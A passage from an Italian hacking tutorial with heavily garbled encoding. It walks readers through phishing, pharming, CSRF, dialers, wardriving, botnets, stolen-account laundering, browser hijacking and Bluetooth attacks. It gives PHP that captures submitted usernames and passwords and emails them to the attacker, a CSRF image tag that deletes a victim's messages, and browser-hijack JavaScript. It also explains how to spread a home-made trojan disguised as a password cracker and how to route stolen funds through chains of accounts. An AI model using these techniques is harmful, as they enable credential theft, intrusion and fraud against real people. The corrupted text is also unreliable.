l)action del form collegato ad esso . Iroverete una cosa del genere (
Pform ............. action S CpaginaDOPinput t>pe ..................
Dove CpaginaD andr sostituita con la pagina che andr a recuperare i dati .
*S &assaggio : #ecupero dati dalla pagina finta
Dobbiamo recuperare tutti i dati della pagina di prima . $ome si fa A Dobbiamo ricordarci i nomi
degli input della username e della pass&ord ( mettiamo che nel nostro caso siano user e pass .
1ella nostra pagina , che da ora in poi chiameremo recupera.php , andremo a scrivere del codice
in grado di recuperare i dati scritti in precedenza (
RuserSRYPHSIa)user)b#
RpassSRYPHSIa)pass)b#
.S &assaggio : Salvataggio dati
?na volta recuperati i dati possiamo memorizzarli dentro un file di testo , oppure in un nostro
database , o ancora inviarceli direttamente nella nostra casella email (
mail(Cnostra.mail.itD,DPass&ord di RuserD,D!a pass&ord * ( RpassD"#
0S&assaggio : #edirect pagina vera
,bbiamo bisogno solo di un po) di _avascript . Per fare ci+ andiamo a scrivere (
PscriptOlocation.href S CpaginaveraD#P/scriptO
B , come per magilla , tutto funzioner a meraviglia M
.ischio
,lcuni sono fatti davvero male , ma altri sono fatti proprio ad occhietto . 1on c)* un vero e
proprio rischio , per+ non posso stare a contare %uanta gente cade nella mano del fa-e
login , ma penso comun%ue tanta . /l rischio potrebbe essere ; , peccato che nella rete
gira la brutta cosa che si chiama ( Disinformazione .
#,C$ 7harming
!o sappiamo tutti , su /nternet ne succedono di tutti i colori . ,bbiamo parlato molto di come i
crac-er sfruttino l)ignoranza delle proprie vittime che serviranno da ponte per i loro trasferimenti
bancari o roba del genere .
Prima abbiamo parlato appunto della disinformazione delle
persone , che vanno a inficcare le proprie pass&ord dove gli viene
chiesta .
!a tecnica del Pharming consiste invece nell)impossessarsi dei dati
personali di una vittima , proprio come il Phishing , ma in modo pi
tecnico che CsocialeD (Fedi Social Bngineer" .
/l D1S , ossia la serie di codici alfanumerici che rappresentano il
&&& di un sito , sono stati creati appositamente perch* la mente umana fa pi difficolt a
ricordarsi una serie di numeri (/P" invece che delle parole sensate . Pertanto , se ci colleghiamo a
&&&.sito.it ci collegheremo al server che come /P avr 423.567.89:.; e come porta solitamente
la 9; (HIIP , ma potr comun%ue essere un)altra , come la 8:,94 o la 9;9;" .
Da %ui il Pharming pu+ essere suddiviso in due tipologie di attacco (
4" /l crac-er , tramite alcune tecniche di infiltrazione , si impossesser del D1S Server
Domain e ne cambier la propriet /P . @ettiamo caso che il server reale abbia come
indirizzo 423.567.89:.; e il server del crac-er avr come indirizzo ;.:98.765.324 , le
vittime (dato che il D1S cambier per tutti" collegandosi a &&&.sito.it riceveranno l)output
che gli offrir il server ;.:98.765.3 . Da lG in poi c)* solo l)immaginazione .
2" /l crac-er andr a manipolare il computer vittima tramite il file dedicato alla censura di un
sito . /n pratica in %uasi tutti i Sistemi Hperativi esiste un file che viene letto ogni volta dal
bro&ser e fa si che per ogni D1S viene indicato un /P # %uindi , nel caso in cui un padre
voglia che suo figlio non visiti &&&.sitopirata.it andr nel suddetto file e indicher al
bro&ser che &&&.sitopirata.it dovr contenere tal /P . Se il crac-er riesce a impossessarsi
del computer vittima gli baster semplicemente modificare tale file (nel caso in cui la
vittima utilizza =indo&s la destinazione del file hosts si trova dentro la path
.ischio
/l Pharming * una tecnica poco praticata perch* * molto rischiosa e difficilmente si riesce a
bucare un sistema D1S , specie se * importante come Bba> e co. Se viene applicato alla
vittima direttamente allora risulta molto pericolosa .
#,D$ !ross "ite .equest /orgereis
Iutti sappiamo che il =eb che vediamo noi , %uello con il Ero&ser e il sito * in realt una
connessione $lient<OServer dove viene instaurata una connessione tramite il protocollo HIIP
(solitamente porta 9; o 9;9;" .
Seguendo la teoria del Cmai reinventare la ruota due volteD prendiamo in considerazione i
sorgenti e i risultati della pagina &eb http(//&&&.php.net/docs.php presentati da HI@!./I .
Bcco il sorgente PHP della pagina (
PAphp
RserverYurl S T&&&.php.netT#
RpaginaYurl S T/docs.phpT#
RplainYresponse S TT#
Rfp S fsoc-open(RserverYurl, 9;"#
fputs(Rfp, TKBI T.RpaginaYurl.T HIIP/4.4frfnT"#
fputs(Rfp, T,ccept( teJt/htmlfrfnT"#
fputs(Rfp, THost( T.RserverYurl.TfrfnT"#
fputs(Rfp, T$ache<$ontrol( maJ<ageS4;;;;frfnT"#
fputs(Rfp, T$onnection( $losefrfnfrfnT"#
&hile (Mfeof(Rfp"" RplainYresponse .S fgets(Rfp"#
fclose(Rfp"#
echo RplainYresponse#
AO
uindi il risultato delle righe di testo inviate al &eb saranno (
KBI /docs.php HIIP/4.4
,ccept( teJt/html
Host( &&&.php.net
$ache<$ontrol( maJ<ageS4;;;;
$onnection( $lose
uindi , una volta eseguita la pagina da lato $lient avremo come output il seguente codice (
HIIP/4.4 2;; HN
Date( @on, 3; @a> 2;;6 ;9(39(47 K@I
Server( ,pache/4.3.27 (?niJ" modYgzip/4.3.27.4a PHP/5.3.3<dev
[<Po&ered<E>( PHP/5.3.3<dev
$ontent<language( en
Set<$oo-ie( $H?1I'`S/I,]2$9;.78.446.52# eJpiresS@on, ;7<_un<;6 ;9(39(47 K@I# pathS/#
domainS.php.net
$onnection( close
Iransfer<Bncoding( chun-ed
$ontent<I>pe( teJt/html#charsetS/SH<996:<4
2;84
PMDH$I`PB html P?E!/$ T<//=3$//DID [HI@! 4.; Strict//B1T
Thttp(//&&&.&3.org/I'/Jhtml4/DID/Jhtml4<strict.dtdTO
Phtml JmlnsSThttp(//&&&.&3.org/4:::/JhtmlT Jml(langSTenT langSTenTO
PheadO
PtitleOPHP( DocumentationP/titleO
Pst>le t>peSTteJt/cssTO
.import url(Thttp(//static.php.net/&&&.php.net/st>les/site.cssT"#
P/st>leO
Plin- relSTshortcut iconT hrefSThttp(//static.php.net/&&&.php.net/favicon.icoT /O
Pscript t>peSTteJt/VavascriptT srcSThttp(//static.php.net/userprefs.VsTOP/scriptO
Pbase hrefSThttp(//&&&.php.net/docs.phpT /O
P/headO
Pbod> onloadSTrunHn!oad("#TO
a... etc ...b
P/bod>O
P/htmlO
;
Fedendo il codice possiamo notare che ci sono tutte le caratteristiche di una normale pagina =eb
. Prendiamo in considerazione ora il tag PimgO che , come molti sapranno , viene utilizzato per
visualizzare un)immagine , mentre con il parametro srcSDlin-D permettiamo al tag di sapere dove
andare a recuperare tali valori .
KBI /immagine.Vpg HIIP/4.4
Bd ecco che andiamo ad analizzare l)attacco vero e proprio ( il $ross Site 'e%uest Uorgeries
consiste nel modificare i lin- di reperimento del tag img , o anche di altri tipi di tag come script e
lin- , che punti a una %ualsiasi altra pagina &eb costruita da noi utilizzante dei parametri inviati
in KBI . Bh lo so , * abbastanza difficile da pensare , ma vedremo pi avanti in pratica come pu+
essere letale per una pagina &eb scritta Ccoi piediD (P . ualcuno sta pensando alla $ross Site
Scripting A Ua bene , molto bene .
,vendone le basi , * possibile che un %ualsiasi crac-er possa volutamente far si che la vittima
che visualizzi tale pagina sia in possesso di una %uer> scritta in S! per far si che vengano
cancellati tutti i suoi messaggi privati (
Pimg srcST sitovittimaAdelS>ZfromYidS4ZnumS4;;;TO
/l bello per+ non finisce %ua ( infatti non sempre si ha bisogno di trovare un CbugD dentro il sito
vittima . @i spiego meglio ( se la vittima visitasse sitovittima , %uindi abbia accesso utente e
vengano creati i coo-ie che risiedono nel $lient , poi si visita il sitocrac-er che reinderizzer
nuovamente l)utente sul sitovittima e , tramite un modulo , che esso sia KBI o PHSI , che sar
costruito ad hoc .
!a costruzione di un attacco del genere richiede tempo e studio sul server vulnerabile ( l)attacco
!"./ consiste %uindi nel far eseguire dei comandi (che essi siano S! o altri non fa differenza"
senza il consenso della vittima in %uestione .
.ischio
/l rischio c)* e non lo si pu+ nascondere . 1on essendoci ancora una vera e propria toppa
al riguardo e gli utenti , essendo blandi e pigri , * %uasi impossibile tenere tutto sotto
controllo (per %uanto riguarda l)amministratore si intede" .
#,A$ >ialer/>ialing
/l problema del Dialing * sempre meno diffuso , %uesto perchL la situazione risulta CtragicaD solo
%uando si * in possesso di una connessione Dial<?p (connessioni modem tramite telefono , le pi
diffuse sono le 67-" .
Di solito si viene infettati da un dialer durante l)esecuzione di un file che va a cambiare le
configurazioni del vostro modem , collegandolo a un numero non scelto da voi che va a mirare
una rete /nternet , una rete di calcolatori , un semplice numero telefonico o un collegamento
/SD1 .
Solitamente i dialer puntano verso linee con una tariffa esorbitante , dove dietro possono
nascondersi truffe e frodi a discapito della vittima . Iuttavia esistono anche numerosi dialer
legittimi .
>ialer Legittimi
, volte capita di dover trovare un dischetto nelle riviste o in allegato a %ualche rivista # tali
dischetti , offerti dai provider che vogliono lanciare sul mercato i propri servizi , contengono del
codice in grado di manipolare la connessione internet di chi li esegue cambiandone provider ,
%uindi numero di connessione a cui ci si collega . /n /talia * una pratica legalissima , purch*
venga avvisato chi avvia tali dischetti di tutti i cambiamenti di sistema che verranno effettuati .
Possono essere Dialer !egittimi anche %uei dialer dove l)utilizzo di un servizio richiede tale
provider # stiamo parlando di numeri a tariffazione speciale come gli 9:: o gli 477 .
>ialer )llegali
$hiun%ue , e ripeto chiunque , offre un servizio di dialing occultandone le tarrifazioni e i costi per
usufruire di tale servizio , viene automaticamente etichettato come criminale , poichL si verifica
un)azione di truffa informatica . $hiun%ue pensa che si * stati contagiati da un dialer illegale e
non pu+ niente in %uanto non ne ha le necessarie competenze tecniche , pu+ rivolgersi alla
Polizia Postale o anche ai $arabinieri (che inoltreranno poi la denuncia" .
Perch* esistono i Dialer A Semplice . Per un =ebmaster che offre dei servizi pagando e offrendoli
gratuitamente fa sempre comodo ricevere una percentuale sui minuti in cui una persona utilizza
un Dialer . Bsistono organizzazioni apposta (che non sto a citare" che offrono %uesto servizio .
$onsiste nell)inserire nella propria pagina &eb un do&nload contenente un Dialer , dal %uale poi
la societ ne ricever i profitti e inoltrer la solita percentuale (che si aggira di solito al 4;]" al
=eb@aster che avr offerto tale servizio .
$onsiderazioni sui Dialer (murdercode" ( !a legge /taliana obbliga i produttori dei Dialer di
mostrare in bella mostra i costi e le tariffe dei servizi di dialing . Purtroppo %ueste informazioni
sono nascoste tra le tante pillole di cazzate che bisogna scriverci . ueste informazioni possono
essere presenti sia sul sito che sul programma , pertanto se le informazioni sono ficcate nel sito e
con il doppio clic- andiamo ad aprire il Dialer non abbiamo diritto al rimborso nL alla denuncia ,
in %uanto con il doppio clic- acconsentiamo al programma di eseguire (ovviamente senza altre
esitazioni dell)autore che lo ha prodotto" . @a se ci accorgessimo solo dopo di aver fatto la
stupidaggine A ui arrivano i bei guadagni della societ . Difatti se vogliamo disdire il contratto ci
toccher pagare ... aimh* , brutta faccenda M
<ome riconoscere un dialer illegale 8
@entre visitiamo una pagina si carica in modo automatico il do&nload di un programma .
Fiene visualizzato solo in parte (a volte neanche * presente" la tariffazione e i costi del
servizio
,nnullando il do&nload il programma viene scaricato comun%ue (utilizzando tecniche di
phishing o di falle del bro&ser e del sistema"
/l Dialer illegale si imposta automaticamente come <onnessione &redefinita .
/l Dialer modifica o crea connessioni indesiderate senza il consenso dell)utente .
!a disinstallazione risulta difficoltosa .
!sistono altre forme di "ialing 8
Si , ma sono legali e meno rischiose . Difatti * possibile pagare l)accesso a una sezione del sito
(%ualora la sezione sia trafficata da moltissimi utenti ,DS! " tramite carta di credito o carte di
credito prepagate , constringendo %uindi l)utente a rendersi conto di tutte le procedure che
verranno effettuate inviando tali dati .
.ischio
/n /talia la situazione * %uesta . Fogliamo tutto , e lo vogliamo subito . $he il Dialer sia
legale o meno , non ci curiamo mai dei problemi fin %uando non si presentano in faccia . B)
sbagliato , ma * cosG . State attenti a %uello che aprite , anche se vi fidate al ::] .
#,@$ =ar>riving
Durante l)utilizzo delle comunicazioni =i<Ui da parte dell)esercito il problema =ardriving non era
presente , o meglio , era un problema preso poco in considerazione . Da %uando per+ le reti
=ireless sono approdate anche nel mercato familiare alcuni genialotti hanno ben pensato di
aprirsi una breccia e di cambiare un po) le regole in %uello che oggi viene chiamato CFecchio
Hac-ingD . Sappiamo tutti che il =ireless consiste appunto nello scambio di informazioni da un
sistema a un altro utilizzando le linee d)aria , tramite le cosiddette fre%uenze # %uesto
ovviamente ha un enorme vantaggio ( niente pi fili e buchi nelle mura , lasciando per+ la
possibilit a chiun%ue di poter far parte di tale fre%uenza . Difatti un cavo ethernet nasce da un
lato e muore dall)altro , togliendo ogni possibilit remota di potersi inficcare nella comunicazione
. 1ella =ireless invece * possibile mettersi fra la nascita e la morte di tali informazioni poichL il
fattore aria * una materia comune . 1essuno ci pu+ vietare di metterci tra un computer e un
router , a patto che %uesta non sia propriet privata . Uortunatamente per i =arDriver (coloro che
praticano il &ardriving" la antenne dei router =i<Ui sono multidirezionali , ossia la trasmissione
viene effettuata a 37;c , dando %uindi la possibilit a chiun%ue si trova nei paragi di poter
usufruire di %uello che si chiama C'icezione dei DatiD .
/l =ardriving consiste nell)intercettare i segnali delle reti =i<Ui , in automobile , a piedi o con
%ualsiasi mezzo in grado di spostarsi tramite l)ausilio di un computer dotato di interfaccia di rete
=i<Ui , abbinato anche a un ricevitore KPS in grado di individuare la zona da cui si riceve il
segnale per memorizzarne poi le coordinate e rendere %uindi pi semplice il Critorno nel luogo del
reatoD .
Bbbene si , fare =arDriving * puro reato ( chiun%ue intercetti comunicazioni
private o usufruisca di %ualun%ue mezzo , che esso sia a pagamento o
gratuito (la situazione * diversa in cui il comune e le autorit competenti
permettono l)accesso alla linea" , * puro reato ed * perseguibile penalmente .
!)utilizzo di antenne omnidirezionali (vedi figura a destra" favorisce al
=arDriver di turno , dopo aver trovare la rete da CscroccareD , di indirizzare
l)antenna nel point desiderato e di sfruttare al meglio la ricezione e la
trasmissione dati .
La comunitT del >ardriving
'icordarsi il chec-point dove si * trovata la rete * un)ottimo sistema per i &ardriver , anzi meglio
&archal-ers , per ritornare lG dove era riusciti a mangiarsi le informazioni di un router o di una
rete =i<Ui generale .
uando la pratica del =ardriving era poco praticata era di %uei tempi utilizzare una bomboletta
spra> o un gessetto per ricordarsi dove era stata trovata la rete .
Da lG in poi * nata una sorta di segnali random , dove ognuno poteva capire %uali erano i sistemi
aperti , chiusi e protetti . ,ncora oggi alcuni &archal-ers si dilettano a scrivere con %uesto
sistema , che viene rappresentato come (
(3mmagine concessa dal copBleft >ikipedia <ommons U http:77it)6ikipedia)org U LHenciclopedia Li5era)
Hggi per+ ci sono i KPS e un sistema che fa gola a tutti , specie ai &archal-ers , con il nome di
Koogle Barth . Bsistono infatti comunit online che offrono le coordinate delle proprie CscoperteD
e le donano a chi ne ha bisogno (su /nfernet http(//infernet.forumup.it sta iniziando un)operazione
del genere" , senza %uindi il problema della caccia al tesoro .
%nalisi di un attacco di 6ardriving
Supponiamo di voler farci un giretto con la nostra auto e di voler effettuare del buon sano
&ardriving (tecnica che * comun%ue illegale senza il consenso di chi scroccate il servizio" .
/nnanzitutto occore un buon programma di auditing che consiste nello scannare continuamente
la zona fin %uando non si ottiene una rete . 'icordo che nel documentario CHackers : %ngeli e
"iavoliD o una cosa del genere c)era appunto un &ardriver che con un programa di auditing
scannava la rete fin %uando un 5ip non gli segnalava l)avvenuta ricezione di segnale .
B) possibile effettuare dell)auditing anche con apparecchi esterni , come ad esempio una PSP
moddata contenente il programma ideato al nostro caso , con il nome poco originale ma dalle
caratteristiche molto buone di =iUi Sniffer . Per i computer esistono invece dei soft&are dedicati
con molte altre applicazioni e tool , tra i %uali cito NetStum5ler per i sistemi =indo&s , Qisac
per i @acintosh , Qismet per i sistemi K1?/!inuJ e inistum5ler per i Poc-etP$ e palmari in
generale dotati di sistema =i<Ui .
Se abbiamo intenzione di fare i &archal-er moderni possiamo utilizzare il ?7" , non adatto per+ a
tutti i sistemi e abbastanza costoso (anche se ultimamente sta andando molto di moda e i costi si
abbassano sempre di pi" .
<aso 1
,bbiamo trovato una rete aperta e abbiamo bisogno di inviare il messaggino d)amore alla nostra
sposa tramite un servizio S@S presente solo su internet A Se il router * DH$P senza protezioni ci
basta collegarci alla rete e navigare . Iutto %ui , niente di pi semplice .
<aso *
?na volta trovato l),ccess Point (,P" abbiamo bisogno di scannerizzare tutti gli /P attivi con i
relativi nomi , porte e servizi attivi sul sistema # per fare %uesto ci vengono incontro un numero
%uasi illimitato di programmi con il nome di )7 "canner .
/n %uesto modo , se * presente un buon numero di computer connessi alla rete , in pochi minuti
avremo sotto mano la fatidica chiave =BP , ossia un codice che viene utilizzato per la protezione
di una rete &ireless .
!a chiave =BP * molto semplice da trovare , %uesto perch* la sua crittografia , composta da 429
bit , invia 25 dei suoi bit che derivano direttamente dal vettore di inizializzazione (/F" del '$5 ,
che , venendo trasmesso in chiaro , ne permettono la chiara lettura . Per %uesto , pi una rete
risulta trafficata pi * possibile che il nostro sniffer riesca a decifrare pi velocemente una chiave
=BP .
<aso .
1el caso in cui l),ccess Point sia protetto da chiave =P, sar necessario un attacco >ictionar%
*ttac( oppure un attacco Brute/orce (vedi capitoli pi avanti" , %uesto perch* i bit sono
completamente coperti , in %uanto il &pa ha una maggiore dimensione della chiave , oltre a un
sistema interno in grado di verificare l)autenticit dei messagi in modo che si pu+ arrivare %uasi
alla stessa sicurezza di una normale connessione ethernet .
.ischio
=ardrving * bello farlo e c)* sempre pi gente che pratica %uesta metodologia . /o stesso
confermo che il 8;/9;] dei router non sono minimamente protetti , tutti DH$P , senza
chiave nL tantomeno @,$ U/!IB'/1K . Uare =ardriving * bello e anche facile . State
attenti alla vostra linea .
#&F$ BotNet e BridgeNet
)l !aso BotNet
Dare alla BotNet l)etichetta di C,ttaccoD risulta come una bestemmia per chi ogni giorno ne fa un
uso sporadico . Diciamo che * uno strumento che viene utilizzato per effettuare alcuni tipi di
attacco , tra cui sorgono gli ,ttacchi DDHS .
$ome =i-ipedia ci insegna , infatti , la botnet non * altro che una rete di computer collegati ad
internet che, a causa di falle nella sicurezza o mancanza di attenzione da parte dell)utente e
dell)amministratore di sistema, vengono infettati da virus informatici o troVan i %uali consentono
ai loro creatori di controllare il sistema da remoto. uesti ultimi possono in %uesto modo sfruttare
i sistemi compromessi per scagliare attacchi distribuiti del tipo Denial of Service (DDoS" contro
%ualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo
persino su commissione di organizzazioni criminali.
/l funzionamento di una botnet dun%ue * assai semplice ( io posseggo una botnet , ossia una lista
di computer infetti , chiamati zombie , con i %uali posso attaccare altri sistemi in maniera di
negazione di servizio , costringendo %uindi il sistema attaccato a collassare senza che io ,
attac-er , debba suturare la mia banda . Per una migliore consultazione dell)attacco leggere il
paragrafo ,ttacchi DoS .
$ome crearsi una botnet
Supponiamo sempre di entrare in una chat /'$ . Scriviamo in chan %ualcosa tipo (
"# $uovissimo programma per crackare le password di %&$ ' http(//)ink *"
Se riusciamo a trovare un chan di lamer , ancora meglio . !oro credono a tutto (ihihi" M /n men che
non si dica verremo cacciati dal chan ... poco importa , %uello che volevamo noi era pubblicare un
falso programma in grado di crac-are le pass&ord di @S1 , %uando invece il file sar un tro3an
di nostra pubblicazione in grado di contattarci ogni %ualvolta la vittima si colleghi a /nternet ,
ci informi dell)attuale indirizzo /P e ci collegher direttamente al sistema infetto .
Perch* di nostra pubblicazione A Semplicemente perch* praticamente I?II/ i troVan pubblici sono
riconoscibili come virus . $he attacco sarebbe se si accorgessero che li stiamo fregando A
B comun%ue sia difficilmente riusciremo a trovare un troVan adatto alle nostre esigenze , magari
in %ualche forum sotto ;da> , ma comun%ue * meglio , per l)attac-er si intende , di fabbricarselo
da solo .
'ipasiamo brevemente il funzionamento di una botnet %uindi (
)l !aso BridgeNet
/n merito al caso Eot1et mi son messo in mente di coniare una nuova parola che penso manchi
nel dizionario informatico ( Eridge1et . @i scuso gi dall)inizio se esisteva un termine simile se
non uguale , ma si sa , il mondo dell)informatica * bello perch* non lo si conosce mai tutto .
3n cosa consiste 8
$on Eridge1et intendiamo una rete di account , %uindi non pi di computer (prima differenza da
una botnet" facenti parte di sistemi mirati all)ac%uisto di beni su /nternet , invece che che
eseguire un attacco DoS (seconda differenza da una botnet" .
!)utilit del termine e del Eridge1et A $onsideriamo il fatto che volessimo fare un trasferimento di
crediti da un account rubato a un altro ( chi sarebbe il pollo che se li trasferisce sul proprio
account A 1essuno penso .
Uacciamo l)ipotesi di avere in possesso un account da :;;.;;; euro . Uacciamo cosG (
*ccount rubato AM ,ridge %ccount AM ,% AM ,% AM ,% AM ,% AM ,% AM *ccount dati falsi
Dove ,ccount dati falsi * l)account dove voi vorrete che i beni vengano inviati . B) possibile anche
modificare un Eridge ,ccount con i vostri dati (indirizzo vero ma nome falso" , cosicch* bisogni
evitare di verificare la vostra autenticit tramite U,[ e dati personali . Easter infatti modificare
dal normale pannello i vostri dati , ricevere la merce e rimodificare l)account .
Per+ sorge il problema ( i log registrano tutto giusto A Per %uesto esistono i Eridge ,ccount .
Solitamente i file di log hanno una data di scadenza , dopodich* * %uasi impossibile recuperarli .
$on un Eridge ,ccount (proprio come la rete IH'" le percentuali di tracing diminuiscono
notevolmente , %uesto per+ si basa ovviamente sulla grandezza di una Eridge1et .
Bsempio (
<<<<<<<<<<<O <<<<<<<O <<<<<<<<O <<<<<<<<O <<<<<<<<<<O
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< !HK U/!B <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< h P< S$,DB1^, U/!B !HK
.ischio
Ehe , non c)* proprio nulla da fare . $)* gente molto pi in gamba di ognuno di voi , di me
e di chiun%ue altro . Hgnuno ha le proprie CspecializzazioniD , nessuno sapr mai tutto del
mondo internet .$ercheranno di fregarci , sempre e comun%ue .
#&,$ 9i3ac(ing
!)hiVac-ing * una tecnica utilizzata per dirottare un utente vittima in un sito Beb con
particolari strutture e immagini per guadagnare denaro sulla pubblicit dai servizi che lo
offrono . Per fare %uesto viene installato un programma nel sistema vittima che infetta il bro&ser
, provocandone i continui accessi al suddetto sito tramite pop<up , preferiti o altro .
/ programmi che praticano HiVac-ing si inseriscono tramite do&nload automatici nel sistema
vittima , infettando alcune chiavi di registro di >indo6s , specie nel programma di /nternet
BJplorer . ?n buon esempio * il cambio home che punta verso siti esterni pornografici o
comun%ue siti pubblicitari . , volte invece viene installata una toolbar nel sistema , o altre volte
cambiano i moduli search della toolbar modificandone il motore di ricerca che viene utilizzato .
<ome si inseriscono nei computer 8
Solitamente si inseriscono nel sistema eseguendo dei controlli *ctiveJ oppure attivando la
pubblicit (solitamente chiamata *d *Bare" tramite programmi esterni (tipo il programma p2p
@orpheus" .
$ome si crea un)applicazione ,ctive[ di session hiVac-ing A
Solitamente una ,ctive[ viene creata con il linguaggio di programmazione di alto livello tipo
Fisual Easic .
Bsempio FE 7.; Z FE 2;;6 (
$on il comando
SaveSetting
Hppure
KetSetting
* possibile accedere a un numero limitato di chiavi di registro di sistema . Per avere un accesso
completo a tali chiavi sar necessario richiamare le ,P/ di =indo&s .
Per $isual ,asic *;;+ invece * disponibile un comando a parte che consente di accedere alle
chiavi di registro tramite il comando (
@>.$omputer.'egistr>
Se invece vogliamo analizzare il codice per inserire in automatico il lin- tra i preferiti basta
eseguire un normale comando in _avascript (
&indo&.eJternal.,ddUavorite(url, titolo"
Se invece volessimo impostare la pagina come home basti eseguire , sempre come _avascript , la
seguente funzione (
this.setHomePage()http(//&&&.sitocattivone.lol)"#
$erchiamo comun%ue di non allargarci troppo . 'imane sempre e comun%ue una pratica sporca ,
vile e infame . Se %ualcuno poi avr intenzione di approfondire tale tecnica pu+ crearsi script di
mano propria , non * molto difficile e il tutto si basa sulla fiducia che andr poi persa .
.ischio
/n /talia la situazione * %uesta . Fogliamo tutto , e lo vogliamo subito . $he il Dialer sia
legale o meno , non ci curiamo mai dei problemi fin %uando non si presentano in faccia .
B) sbagliato , ma * cosG . State attenti a %uello che aprite , anche se vi fidate al ::] .
#&&$ Bluetooth
$ome per tutte le tecnologie , anche il Bluetooth finisce nella lista nera di uno smanettone . /l
bluetooth * stata una tecnologia rivoluzionaria , in %uanto ha permesso a milioni di persone di
fare uno scambio dati da un sistema a un altro , specie tra i cellulari di ultima generazione .
/l funzionamento Eluetooth * simile a %uello =ireless , con l)unica differenza che il sistema lavora
con onde radio a basso raggio tra le bande di fre%uenza )"0 (2,56Kh^<2,67Kh^" . /l limite di
sistemi che possono lavorare contemporaneamente nello stesso range e%uivale a 47 , mentre il
sistema in se supporta fino a 8 canali dati , con un upstream di 68,7 Nbps di data rate , 824 Nbps
di do6nstream e tre canali voci sincroni con un date rate di 75 Nbps . 'iuscendo a fare due conti
%uindi la velocit totale di un sistema bluetooth si aggira sui 4@bps (ovviamente non * mai la
velocit effettiva" e riesce a coprire una distanza dai 4; ai 4;; metri .
$ome per la teoria della =ireless con &ardriving , anche il Eluetooth , non essendo a connessione
cablata ma utilizzando la linea d)aria e le fre%uenze per comunicare , chiun%ue si trovasse nei
paragi avrebbe la possibilit di ricezione e trasmissione dei dati .
Per %uesto , %uando si parla di Eluetooth ,ttac- , si presenta la vulnerabilit di (
'iuscire ad impossessarsi di tutti i dati presenti nel cellulare e nella carta S/@ utilizzata ,
%uindi numeri in rubrica , messaggi ricevuti e inviati , contatti , messaggi di posta , pagine
visitate tramite =ap o ?@IS ecc ...
/nviare immagini , file o %uant)altro a cellulari connessi alla rete bluetooth senza che
%uesti debbano accettare la richiesta
?tilizzare il cellulare da remoto , %uindi prenderne possesso senza un accesso fisico ma
tramite il vostro cellulare connesso ad esso . $on %uesto * possibile effettuare chiamate a
discapito di chi subisce l)attacco , inviare file dal suo nome , mandare messaggi e perfino
iniettare nel proprio cellulare virus e troIan , proprio come succede nei computer .
Blue:ac(ing
/l blueVac-ing * una pratica che consiste nell)inviare messaggi dati a un
dispositivo connesso alla rete bluetooth , che esso sia un PD, , un cellulare o
un portatile non importa . Solitamente %uesta tecnica non riesce ad intaccare il
sistema vittima , perlopi viene utilizzato per fare degli scherzi , come inviare
messaggi , immagini , suoni o video in maniera anonima .
uesto , per+ . non * del tutto vero ( il ElueVac-ing viene utilizzato anche per produrre "7*0
(messaggi pubblicitari mai richiesti" o anche per ricevere file infetti , tipo i famosi virus in
formato .s>s . /nfatti , un file .s>s (tema" se viene installato nel sistema produrr in effetto
catastrofico nel vostro cellulare , dalla perdita dati allo sformattamento della grafica fino a
renderlo inutilizzabile se non con un reset fatto da un rivenditore .
.ischio
/n se l)attacco non * rischiosissimo , infatti basterebbe semplicemente impostare una
chiave d)accesso e di cancellare le richieste di connessioni dirette di bluetooth . Peccato
che non lo fa nessuno .
Bluesnarfing L Bluebugging
, differenza del ElueVac-ing , il Eluesnarfing risulta essere un vero e proprio
attacco , con tanto di violazione di sistema . Difatti l)hac-er , o l)attac-er in
generale , riesce a penetrare tale sistema sgraffignando alcune informazioni
importanti del cellulare , come rubrica , messaggi , codice )0-) (/nternational
@obile B%uipment /dentit>" con il %uale * possibile effettuare la clonazione del
dispositivo .
,nche se * un attacco molto difficile da attuare , sulla rete girano alcuni tool in grado di riuscire a
forzare il sistema , ma solo se %uest)ultimo risulta pi debole (in termini di potenza di calcolo e di
trasmissione bluetooth" del vostro . Iale programma di chiama adro ,luehacker ed * reperibile
nel nostro forum all)indirizzo http(//infernet.forumup.it .
uesto tipo di attacco * CfattibileD solo se la vittima di turno avesse predisposto il
bluetooth visibile a tutti . B se invece lo avesse nascosto A
B) un problema per l)attac-er . B) un grosso problema , ma superabile . Difatti il
blueattac-er si trover costretto a scannare l'intero range di B>M*>>. fino a
trovare il sistema sperato . Purtroppo %uesta pratica richiede parecchio tempo ,
pertanto sarebbe inutile fare del bruteforcing di EDY,DD' mentre si * in
movimento , %uindi dentro un)auto o mentre si cammina . Se invece ci troviamo
dentro una sala d)aspetto , o ancora meglio dentro un treno dove nessuno si
accorge di %uello che state facendo . Hvviamente %uando si ha bisogno di un tool
in grado di facilitare le operazioni e non ce ne sono , si creano . Bd * per %uesto
che il team shmoo sta sviluppando un programma molto carino che si chiama
,luesniff (http(//bluesniff.shmoo.com/" che , come promette il team , verr
integrato insieme a ,irsnort , oppure il programma Etscanner , arrivato ora alla
versione 2.; (http(//&&&.pentest.co.u-/" .
Uin %ua per la vittima non c)* alcun problema , dato che basta una semplice pass&ord per
bloccare gli accessi all)attac-er ( ad aggravare la situazione , invece , sono disponibili alcuni
bac-door presenti su alcuni Son><Bricsson , 1o-ia e altri modelli di cellulare con tecnologia
S>mbian . Difatti * possibile sfruttare %uesti bug per riuscire ad ottenere un accesso tipo CpairedD
nel sistema vittima .
Se non esiste il 5ug 8
Eeh , * un problema , superabile con un po) di ingegneria sociale . Difatti , durante il
collegamento , verr chiesta l)accesso al sistema vittima . Uorse non sar possibile accedere la
prima volta , ma dopo una decina di volte riusciremo a connetterci al sistema , sperando
ovviamente che la vittima si sia stufata di ricevere le notifiche e vi permetti di connettersi al
vostro sistema .
Fna volta ottenuto lHaccesso paired 8
B) possibile fare tutto ( da inviare messaggi , effettuare chiamate , connettersi a /nternet e tutte
%uelle cose che si possono fare come se voi aveste il cellulare sotto mano .
.ischio
Sapete %uanti sistemi sono vulnerabili A 1o A Bntrate in un autobus ben trafficato ,
accendete i vostri tool di pentesting del bluetooth e ... meravigliatevi . $he bisogno c)* di
crac-are un provider , %uando * possibile parlare gratis con un utente sbadato A $osG *
come la pensano i blueattac-er .... fidatevi #"
#&1$ .eversing L !rac(ing
Kli smanettoni del P$ come voi avranno sicuramente sentito parlare di Hac-er, $rac-er e
'everser.
9ac(er deriva dal termine inglese Thac-T che significa spezzare. Uigura evoluta soprattutto con
l)avvento di internet, possiamo definirlo un esperto informatico specializzato nel campo delle reti,
infatti l)hac-er usa soprattutto le vie della rete per arrivare dove altri non riescono. $ol passare
degli anni Hac-er divent+ un termine per indicare un pirata informatico.
